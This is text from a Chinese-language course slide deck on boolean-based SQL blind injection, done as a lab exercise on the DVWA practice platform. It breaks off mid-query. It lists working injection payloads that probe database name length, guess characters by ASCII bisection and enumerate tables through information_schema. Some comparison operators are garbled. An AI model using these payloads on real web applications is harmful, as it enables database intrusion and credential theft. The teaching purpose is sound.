网络安全原理与应用：SQL盲注.pptxVIP

SQL盲注 第7章 Web应用安全 目标 Objectives 要求 了解SQL盲注的基本方法； 掌握在DVWA平台上进行SQL盲注的方法； SQL盲注 一、SQL盲注 SQL盲注，与一般注入的区别在于，一般的注入攻击者可以直接从页面上看到注入语句的执行结果，而盲注时攻击者通常是无法从显示页面上获取执行结果，甚至连注入语句是否执行都无从得知，因此盲注的难度要比一般注入高。 手工盲注的过程，就像你与一个机器人聊天，这个机器人知道的很多，但只会回答“是”或者“不是”，因此你需要询问它这样的问题，例如“数据库名字的第一个字母是不是a啊？”，通过这种机械的询问，最终获得你想要的数据。 盲注分为基于布尔的盲注、基于时间的盲注以及基于报错的盲注 SQL盲注 二、SQL盲注（布尔盲注） 知识点任务 通过SQL布尔盲注的方法获取admin的密码 1、检查是否存在注入点 2、猜解数据库名的长度 3、获取数据库名称 4、猜解数据表的长度 5、获取数据表名 6、猜解数据库字段的长度 7、获取字段名 8、获取字段数据 SQL盲注 二、SQL盲注（布尔盲注） 1、进入DVWA平台，选择DVWA Security，将安全级别设置为Low。 2、选择SQL Injection（Blind），进入如下页面。 SQL盲注 二、SQL盲注（布尔盲注） 3、使用参数1‘ and 1=1 #进行提交，页面显示存在。使用参数1’ and 1=2 #进行提交，页面显示不存在。 说明存在布尔盲注的注入点，我们可以通过SQL语句返回结果的真假来进行注入攻击。 SQL盲注 二、SQL盲注（布尔盲注） 4、猜解数据库名的长度 函数length()——获取字符串的长度 1’ and length(database())=1 # //显示不存在 1’ and length(database())=2 # //显示不存在 1’ and length(database())=3 # //显示不存在 1’ and length(database())=4 # //显示存在 说明数据库名的长度为4个字符。 SQL盲注 二、SQL盲注（布尔盲注） 5、使用二分法猜解数据库名字符的ASCII码 函数substr()——提取指定起点的指定长度字符串 小写字母a-z的ASCII码值范围97-122 大写字母A-Z的ASCII码值范围65-90 数字0-9的ASCII码值范围48-57 1’and ascii(substr(database(),1,1))100 # //显示不存在 1’and ascii(substr(database(),1,1))100 # //显示不存在，说明第一个字符=100，就是字母d 1’ and ascii(substr(database(),2,1))118 # //显示不存在 1’ and ascii(substr(database(),2,1))118 # //显示不存在，说明第二个字符=118，就是字母v 多次反复尝试，最终获取数据库名为：dvwa SQL盲注 二、SQL盲注（布尔盲注） 6、猜解dvwa数据库中数据表的数量 1 and (select count(table_name) from information_schema.tables where table_schema=database())=1 # //显示不存在 1 and (select count(table_name) from information_schema.tables where table_schema=database())=2 # //显示存在 数据表的数量是2个 SQL盲注 二、SQL盲注（布尔盲注） 7、猜解数据表名的字符长度 1 and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 # //显示存在 说明第一个数据表名的字符长度为9 1 and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=5 # //显示存在 说明第二个数据表名的字符长度为5 SQL盲注 二、SQL盲注（布尔盲注） 8、 猜解数据表的名称 1 and ascii(substr((select table_name from information_schema.tables wher